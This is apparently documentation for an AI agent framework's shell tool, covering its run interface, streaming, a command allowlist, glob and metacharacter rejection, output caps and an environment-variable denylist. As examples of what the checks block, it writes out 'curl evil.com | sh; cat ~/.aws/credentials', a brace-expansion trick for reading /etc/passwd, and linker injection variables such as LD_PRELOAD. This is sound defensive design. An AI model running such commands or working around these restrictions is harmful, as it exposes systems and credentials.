Shell Module
The Shell interface gives your agent the ability to run shell commands to completion. v1 ships run only — interactive sessions (stdin, vim, REPLs) are reserved for a future spawn method.
Interface
interface Shell {
  run(cmd: string, opts?: ShellRunOptions): Promise<RunResult>;
}
interface ShellRunOptions {
  readonly cwd?: string;
  readonly env?: Record<string, string>;
  readonly signal?: AbortSignal;
  readonly timeoutMs?: number;
  /** Async callback; providers must await it for backpressure. */
  readonly onStdout?: (chunk: Uint8Array) => Promise<void>;
  readonly onStderr?: (chunk: Uint8Array) => Promise<void>;
}
interface RunResult {
  readonly stdout: Uint8Array;
  readonly stderr: Uint8Array;
  readonly exitCode: number;
  readonly durationMs: number;
  /**
   * Errors thrown by `onStdout` / `onStderr` callbacks during the run.
   * Absent on the common path. Inspect this to detect callback-side issues
   * without conflating them with command-side failures.
   */
  readonly callbackErrors?: readonly Error[];
}
runSucceeded(r) helper
import { runSucceeded } from '@helix-agents/core';
const result = await ws.shell!.run('npm test', { onStdout: ... });
if (!runSucceeded(result)) {
  // result.exitCode !== 0 OR a stream callback threw
}
runSucceeded(r: RunResult) returns true if and only if r.exitCode === 0 AND no consumer callback threw. Use it instead of r.exitCode === 0 when you want to treat callback errors as failures. The bare exitCode check masks real bugs in your stream consumers, because the contract intentionally keeps callback errors out of the process exit code.
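The rule above can be sketched in a few lines. This is a hypothetical re-implementation for illustration only: the real helper is the one exported from @helix-agents/core and may differ in detail. The sketch assumes that an absent or empty callbackErrors means no callback threw, and it redeclares RunResult locally so it stands alone.

```typescript
// Local copy of the RunResult shape documented above, so the sketch is self-contained.
interface RunResult {
  readonly stdout: Uint8Array;
  readonly stderr: Uint8Array;
  readonly exitCode: number;
  readonly durationMs: number;
  readonly callbackErrors?: readonly Error[];
}

// Hypothetical stand-in for runSucceeded; not the library's source.
function runSucceededSketch(r: RunResult): boolean {
  // Assumption: absent or empty callbackErrors both mean "no callback threw".
  const callbackFailed = (r.callbackErrors?.length ?? 0) > 0;
  return r.exitCode === 0 && !callbackFailed;
}

const empty = new Uint8Array(0);
const clean: RunResult = { stdout: empty, stderr: empty, exitCode: 0, durationMs: 12 };
const consumerBug: RunResult = { ...clean, callbackErrors: [new Error('parse failed')] };

console.log(runSucceededSketch(clean));       // true
console.log(runSucceededSketch(consumerBug)); // false, although exitCode is 0
```

The second case is the one a bare exitCode check would miss: the command itself exited cleanly, but the consumer did not process its output.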
Real-time streaming
The onStdout / onStderr callbacks are how providers stream output as it arrives. The contract:
- When callbacks ARE present: the provider streams chunks as they're produced and awaits each callback before continuing (backpressure).
- When callbacks are NOT present: the provider may use a blocking exec call and return everything at once.
Whichever path is taken, result.stdout and result.stderr always contain the FULL accumulated output.
This dual-mode design lets providers like CloudflareSandboxShell switch between execStream (SSE) when callbacks are present and exec (blocking) when not — without callers needing to know which path is in play.
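A minimal sketch of the streaming half of this contract, assuming the provider can expose command output as an async iterable of chunks. The names drainStream and fakeChunks are hypothetical and not part of the Helix API, and the choice to keep draining after a callback throws is an assumption inferred from the callbackErrors field rather than something the contract spells out.

```typescript
type ChunkCallback = (chunk: Uint8Array) => Promise<void>;

interface DrainResult {
  readonly output: Uint8Array;
  readonly callbackErrors: readonly Error[];
}

// Hypothetical provider-side helper (not part of the Helix API).
async function drainStream(
  source: AsyncIterable<Uint8Array>,
  onChunk?: ChunkCallback,
): Promise<DrainResult> {
  const parts: Uint8Array[] = [];
  const callbackErrors: Error[] = [];

  for await (const chunk of source) {
    // Accumulate first, so the final result is complete on either path.
    parts.push(chunk);
    if (onChunk === undefined) continue;
    try {
      // Awaiting here is the backpressure: the next chunk is not pulled
      // from the source until the consumer has finished with this one.
      await onChunk(chunk);
    } catch (err) {
      // Assumption: callback failures are recorded, not rethrown.
      callbackErrors.push(err instanceof Error ? err : new Error(String(err)));
    }
  }

  // Concatenate the accumulated chunks into one buffer.
  const output = new Uint8Array(parts.reduce((n, p) => n + p.length, 0));
  let offset = 0;
  for (const part of parts) {
    output.set(part, offset);
    offset += part.length;
  }
  return { output, callbackErrors };
}

// Stand-in for a provider's chunk stream: "hi" followed by "!".
async function* fakeChunks(): AsyncGenerator<Uint8Array> {
  yield Uint8Array.from([104, 105]);
  yield Uint8Array.from([33]);
}
```

Calling drainStream(fakeChunks()) without a callback and with one yields the same three accumulated bytes, which mirrors the guarantee that the result holds the full output whichever path is taken.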
The auto-injected workspace__<name>__run tool always passes callbacks that emit chunks to the agent's event stream. So when an LLM calls workspace__box__run('npm install') in a real-time-capable provider, you get live progress in your agent stream.
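On the consumer side, chunks arrive as raw bytes with no guarantee that they end on a line boundary. The following sketch shows one way to turn them into complete lines before forwarding them; makeLineSplitter is a hypothetical helper, not something the framework ships. It relies on the standard TextDecoder stream option so a multi-byte character split across two chunks decodes correctly.

```typescript
// Hypothetical consumer-side helper: turns raw chunks into complete lines.
function makeLineSplitter(
  onLine: (line: string) => void,
): (chunk: Uint8Array) => Promise<void> {
  // One decoder per stream, so partial characters carry over between chunks.
  const decoder = new TextDecoder('utf-8');
  let pending = '';

  return async (chunk: Uint8Array): Promise<void> => {
    pending += decoder.decode(chunk, { stream: true });
    const lines = pending.split('\n');
    // The last element is an unfinished line (or ''), so hold it back.
    pending = lines.pop() ?? '';
    for (const line of lines) onLine(line);
  };
}

// Usage shape, following the interface above (ws is assumed to exist):
//   await ws.shell!.run('npm install', { onStdout: makeLineSplitter(console.log) });
```

Text after the final newline stays buffered in this sketch; a real consumer would flush it once run resolves, or read the complete output from result.stdout.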
signal.aborted semantics
Providers that support signal MUST break their iteration / kill the underlying process when signal.aborted flips to true. The result.exitCode after abort is provider-specific (typically 0 if no exit event was seen, or -1 if the process was killed before exit).
The CloudflareSandboxShell checks signal.aborted at iteration start in its streaming path — chunks in flight when abort fires are not accumulated and the callback is not invoked.
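The check-at-iteration-start behavior can be illustrated with a small loop. This is a sketch under the assumption that output arrives as an async iterable; collectUntilAborted and threeChunks are hypothetical names, and this is not CloudflareSandboxShell's actual code.

```typescript
// Hypothetical streaming loop that honors an AbortSignal.
async function collectUntilAborted(
  source: AsyncIterable<Uint8Array>,
  signal: AbortSignal,
  onChunk: (chunk: Uint8Array) => Promise<void>,
): Promise<Uint8Array[]> {
  const kept: Uint8Array[] = [];
  for await (const chunk of source) {
    // Checked at iteration start: a chunk that arrives after the abort is
    // neither accumulated nor passed to the callback.
    if (signal.aborted) break;
    kept.push(chunk);
    await onChunk(chunk);
  }
  // Leaving a for-await loop early calls the iterator's return(), which is
  // where a real provider would release or kill the underlying process.
  return kept;
}

// Stand-in for a provider's chunk stream.
async function* threeChunks(): AsyncGenerator<Uint8Array> {
  yield Uint8Array.from([1]);
  yield Uint8Array.from([2]);
  yield Uint8Array.from([3]);
}
```

If the callback aborts the controller while handling the first chunk, the second chunk is already in flight but is dropped at the top of the next iteration, so only one chunk is kept.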
Auto-injected tool
For a workspace named <name> with shell: true:
| Tool | Schema | Returns |
|---|---|---|
| workspace__<name>__run | { command: string; cwd?: string; env?: Record<string, string>; timeoutMs?: number } | { stdout: string; stderr: string; exitCode: number; durationMs: number } |
The tool emits workspace_stdout / workspace_stderr events to the agent's event stream as chunks arrive — your downstream consumers (the AI SDK frontend, custom event handlers) see live output.
env limits enforced by the tool
The auto-injected run tool validates the LLM-supplied env map at the framework layer before reaching the provider:
- At most 256 keys.
- Each value is at most 64 KB.
Both limits are generous for legitimate use (256 keys covers a normal app env; 64 KB covers any reasonable secret payload). They exist to reject adversarial prompts that try to create allocation pressure in the Node-side spawn path (e.g. a 100k-key map or a single 100 MB value) before the OS would fail the spawn with POSIX E2BIG. Violations throw at the Zod validation step with a clear message; the limits can be revisited in a follow-up if a legitimate workload hits them.
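The two limits can be expressed as a small validator. The real check lives in a Zod schema; the sketch below uses plain TypeScript so it runs without dependencies, and checkEnvLimits is a hypothetical name. It also assumes that "64 KB" means 65,536 bytes of UTF-8, which the text does not specify.

```typescript
const MAX_ENV_KEYS = 256;
// Assumption: "64 KB" is measured as 64 * 1024 UTF-8 bytes.
const MAX_ENV_VALUE_BYTES = 64 * 1024;

// Hypothetical validator: returns an error message, or null if env is acceptable.
function checkEnvLimits(env: Record<string, string>): string | null {
  const entries = Object.entries(env);
  if (entries.length > MAX_ENV_KEYS) {
    return `env has ${entries.length} keys; at most ${MAX_ENV_KEYS} are allowed`;
  }
  const encoder = new TextEncoder();
  for (const [key, value] of entries) {
    const size = encoder.encode(value).length;
    if (size > MAX_ENV_VALUE_BYTES) {
      return `env.${key} is ${size} bytes; at most ${MAX_ENV_VALUE_BYTES} are allowed`;
    }
  }
  return null;
}

console.log(checkEnvLimits({ NODE_ENV: 'test' }));         // null
console.log(checkEnvLimits({ BIG: 'x'.repeat(70_000) }));  // env.BIG is 70000 bytes; at most 65536 are allowed
```

Checking the key count before touching any value keeps the cost of rejecting an oversized map proportional to the number of keys, not to the total payload size.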
Capability config
interface ShellCapConfig {
  /** Allowlist of command first-tokens. Other commands throw at the tool layer. */
  allowedCommands?: readonly string[];
  /** Default timeoutMs applied when the tool input doesn't override. */
  maxDurationMs?: number;
  /** Round-5 (A6): opt in to bash brace/glob/wildcard/tilde expansion. Default false. */
  glob?: boolean;
  /** Round-5 (A8): max bytes returned per stream (stdout, stderr). Default 256 KiB. */
  maxStdoutBytes?: number;
}
allowedCommands enforces a first-token allowlist:
capabilities: {
  shell: { allowedCommands: ['ls', 'cat', 'wc', 'grep'] },
}
The auto-injected tool checks command.split(/\s+/)[0] against the list before delegating to the provider. Useful for restricting an LLM to a small command vocabulary.
maxDurationMs becomes the default timeoutMs if the tool input doesn't supply one.
Secure-by-default — allowedCommands is required
As of round-4 (security cluster A), an undefined or empty allowedCommands rejects ALL commands with a clear "no commands are allowed" error. The boolean form shell: true is equivalent to shell: { allowedCommands: undefined } and is also rejected. Operators must explicitly opt in to the commands they want by listing them.
Pre-fix, shell: true permitted any command, including curl evil.com | sh; cat ~/.aws/credentials, because the metacharacter check was gated on a non-empty allowlist. The metacharacter check now ALWAYS runs, regardless of allowlist presence; combined with the explicit opt-in allowlist, this gives the auto-injected run tool a safe baseline by default.
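The first-token rule and the reject-by-default behavior can be sketched together. checkFirstToken is a hypothetical helper, not the library's checkCommandAllowed; it uses the same command.split(/\s+/)[0] expression the tool is described as using and covers only the allowlist, not the metacharacter check. The wording of the second error message is made up for the example.

```typescript
// Hypothetical allowlist check: throws if the command may not run.
function checkFirstToken(command: string, allowedCommands?: readonly string[]): void {
  // Secure by default: an undefined or empty allowlist rejects everything.
  if (allowedCommands === undefined || allowedCommands.length === 0) {
    throw new Error('no commands are allowed');
  }
  const firstToken = command.split(/\s+/)[0] ?? '';
  if (!allowedCommands.includes(firstToken)) {
    // Illustrative message; the real error text is not shown in this document.
    throw new Error(`command "${firstToken}" is not in allowedCommands`);
  }
}

checkFirstToken('ls -la /tmp', ['ls', 'cat']); // passes silently

try {
  checkFirstToken('ls -la /tmp', undefined);   // what shell: true amounts to
} catch (err) {
  console.log((err as Error).message);         // no commands are allowed
}
```

Because only the first token is compared, this layer says nothing about the arguments, which is why the metacharacter and expansion checks exist as separate rules.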
Brace / glob / wildcard rejection (round-5 A6)
Bash expands {, }, *, ?, [, ], ~ BEFORE running the command. With allowedCommands: ['cat'], an unsuspecting agent could execute cat /etc/{passwd,hostname}: bash expands it to cat /etc/passwd /etc/hostname, and because the command's first token is still cat, the allowlist passes. Pre-fix, this turned a permitted single-file read into filesystem enumeration.
Post-fix, the auto-injected run tool rejects any command whose args contain {, }, *, ?, [, ], or ~ by default. The first defense layer is in core/workspace/utils/shell-allowlist.ts's checkCommandAllowed; the secondary defense lives in SubprocessShell.enforceAllowlist and CloudflareSandboxShell.enforcePolicy so direct ws.shell.run() calls (custom user tools that bypass the auto-injected layer) honor the same rule.
The metacharacter check (;, &&, |, `, $(, etc.) is unchanged — it's a different threat class (chaining vs expansion) and stays rejected unconditionally.
Opt in to globs when you legitimately need them:
capabilities: {
  shell: {
    allowedCommands: ['ls', 'cat'],
    glob: true, // permits cat *.txt, ls /tmp/{a,b}/*
  },
}
The opt-in still keeps the metachar chaining check active and the first-token allowlist active. Only the brace/glob/wildcard char check is bypassed. Agents handling untrusted content should leave glob: false (the default).
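To make the interaction between the two checks concrete, here is a sketch of how they might be layered. checkShellSyntax is a hypothetical helper, not the code in shell-allowlist.ts. The chaining list contains only the tokens this document names, so it is deliberately partial, and the rejection messages are made up for the example.

```typescript
// Characters bash expands before the command runs (from the list above).
const EXPANSION_CHARS = ['{', '}', '*', '?', '[', ']', '~'] as const;

// Only the chaining tokens named in the text; the real check covers more.
const CHAINING_TOKENS = [';', '&&', '|', '`', '$('] as const;

// Hypothetical helper: returns a rejection reason, or null if the command passes.
function checkShellSyntax(command: string, glob = false): string | null {
  // Chaining is rejected unconditionally, whatever the glob setting.
  for (const token of CHAINING_TOKENS) {
    if (command.includes(token)) return `chaining token "${token}" is not allowed`;
  }
  // glob: true bypasses only the expansion-character check.
  if (glob) return null;
  const args = command.split(/\s+/).slice(1).join(' ');
  for (const ch of EXPANSION_CHARS) {
    if (args.includes(ch)) return `expansion character "${ch}" is not allowed`;
  }
  return null;
}

console.log(checkShellSyntax('cat /etc/{passwd,hostname}'));       // expansion character "{" is not allowed
console.log(checkShellSyntax('cat *.txt', true));                  // null
console.log(checkShellSyntax('cat *.txt; cat secrets.env', true)); // chaining token ";" is not allowed
```

The third call shows why the opt-in is narrower than it may look: turning on glob never re-enables command chaining.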
stdout/stderr caps (round-5 A8)
The auto-injected run tool truncates stdout and stderr at maxStdoutBytes (default 256 KiB each). Excess bytes are dropped and the tool result carries:
- stdoutTruncated: true, stdoutOmittedBytes: N (resp. stderr*)
- A deterministic suffix \n[... truncated, N bytes omitted; refine your search/path] appended to the truncated stream
Without the cap, an LLM running find / -type f would dump multi-megabyte output to the agent context, blow the LLM's context window, and silently fail the agent loop. Operators tuning for log-analysis agents that legitimately need large output should raise maxStdoutBytes; the default is conservative.
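The truncation rule can be sketched per stream as follows. capStream and its result field names are hypothetical (the tool itself reports stdoutTruncated / stdoutOmittedBytes and their stderr equivalents), and the sketch assumes the suffix is appended after the cap is applied and does not count toward it.

```typescript
const DEFAULT_MAX_STDOUT_BYTES = 256 * 1024; // 256 KiB, the documented default

interface CappedStream {
  readonly text: string;
  readonly truncated: boolean;
  readonly omittedBytes: number;
}

// Hypothetical helper: caps one stream and appends the deterministic suffix.
function capStream(bytes: Uint8Array, maxBytes: number = DEFAULT_MAX_STDOUT_BYTES): CappedStream {
  const decoder = new TextDecoder('utf-8');
  if (bytes.length <= maxBytes) {
    return { text: decoder.decode(bytes), truncated: false, omittedBytes: 0 };
  }
  const omittedBytes = bytes.length - maxBytes;
  // subarray creates a view, so the dropped bytes are never copied.
  const kept = decoder.decode(bytes.subarray(0, maxBytes));
  return {
    text: `${kept}\n[... truncated, ${omittedBytes} bytes omitted; refine your search/path]`,
    truncated: true,
    omittedBytes,
  };
}

const tenAs = new Uint8Array(10).fill(97); // "aaaaaaaaaa"
console.log(capStream(tenAs, 4).omittedBytes); // 6
```

Cutting at a byte offset can split a multi-byte UTF-8 character; the default TextDecoder replaces the dangling bytes with U+FFFD instead of throwing, which is acceptable for a sketch but worth handling deliberately in real code.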
The captured streams are wrapped in <workspace_tool_result untrusted="true"> boundary tags (round-5 A9) — see the fs module's untrusted-content section for the design rationale.
Privilege-escalation env denylist
Per-call env is rejected at the Zod schema layer (and again at the runtime in SubprocessShell / CloudflareSandboxShell) when it carries any of:
LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT,
DYLD_INSERT_LIBRARIES, DYLD_LIBRARY_PATH,
NODE_OPTIONS, PYTHONPATH, PERL5OPT
These are linker / interpreter knobs that an attacker can use to load arbitrary code into the spawned subprocess after planting a payload via write_file. The denylist holds the literal injection-vector names recognized by the OS / runtime and is matched case-sensitively and exactly: LD_PRELOAD_FOO is allowed because it's not a recognized linker variable. The full list lives in PRIVILEGE_ESCALATING_ENV_VARS in @helix-agents/core.
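The exact-match rule is easy to show in code. The set below copies the eight names listed above and is only a stand-in: the authoritative list is PRIVILEGE_ESCALATING_ENV_VARS in @helix-agents/core, and findDeniedEnvKeys is a hypothetical helper name.

```typescript
// Stand-in for PRIVILEGE_ESCALATING_ENV_VARS, copied from the names above.
const DENYLIST_SKETCH: ReadonlySet<string> = new Set([
  'LD_PRELOAD', 'LD_LIBRARY_PATH', 'LD_AUDIT',
  'DYLD_INSERT_LIBRARIES', 'DYLD_LIBRARY_PATH',
  'NODE_OPTIONS', 'PYTHONPATH', 'PERL5OPT',
]);

// Hypothetical helper: returns the keys of env that are on the denylist.
function findDeniedEnvKeys(env: Record<string, string>): string[] {
  // Set.has is a case-sensitive, whole-string comparison, so prefixes and
  // lowercase variants do not match.
  return Object.keys(env).filter((key) => DENYLIST_SKETCH.has(key));
}

console.log(findDeniedEnvKeys({
  LD_PRELOAD: '/tmp/evil.so', // denied
  LD_PRELOAD_FOO: '1',        // allowed: not an exact match
  ld_preload: '1',            // allowed: case differs
}));
// [ 'LD_PRELOAD' ]
```

A non-empty result would be the signal to reject the call before anything is spawned.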
Deferred features
- spawn: interactive sessions with stdin streaming, PTY support. Reserved for the v2 shell module.
- stdin: passing data to a running command. Workaround: use writeFile to a temp path, then command < /tmp/path.
- PTY: terminal emulation, color codes, vim/nano. Same v2 timeline as spawn.
Provider support matrix
| Provider | shell supported |
|---|---|
| In-Memory | ❌ |
| Local Bash | ✅ (subprocess) |
| Cloudflare Filestore | ❌ |
| Cloudflare Sandbox | ✅ (with real-time streaming via execStream + SSE) |
Source
- Interface: packages/core/src/workspace/types/modules/shell.ts
- Tool injection: packages/core/src/workspace/tool-injection.ts (search for makeShellTools)